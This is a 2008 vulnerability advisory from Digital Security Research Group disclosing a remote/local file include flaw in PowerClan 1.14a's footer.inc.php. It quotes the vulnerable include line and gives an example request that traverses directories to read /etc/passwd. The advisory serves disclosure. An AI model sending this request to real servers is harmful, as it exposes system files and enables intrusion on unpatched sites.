DSECRG-08-020.txt

`  
  
  
[DSECRG-08-020] Digital Security Research Group [DSecRG] Advisory   
  
  
Application: PowerClan  
Versions Affected: 1.14a  
Vendor URL: http://www.powerscripts.org/  
Bug: Remote/Local File Include  
Exploits: YES  
Reported: 01.02.2008  
Vendor Response: none  
Solution: none  
Date of Public Advisory: ..2008  
Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)  
  
  
  
Description  
***********  
  
Remote/Local File Include vulnerability found in script footer.inc.php  
  
To exploit this vulnerability REGISTER_GLOBALS option must be ON in php config file.  
  
  
Code  
****  
#################################################  
  
include($settings[footer]);  
  
#################################################  
  
  
Example:  
  
http://[server]/[installdir]/footer.inc.php?settings[footer]=../../../../../../../../../../../../../etc/passwd  
  
  
  
About  
*****  
  
Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.  
  
  
Contact: research [at] dsec [dot] ru  
http://www.dsec.ru (in Russian)  
  
  
  
--   
Alexandr Polyakov  
DIGITAL SECURITY RESEARCH GROUP  
  
mailto:[email protected]  
`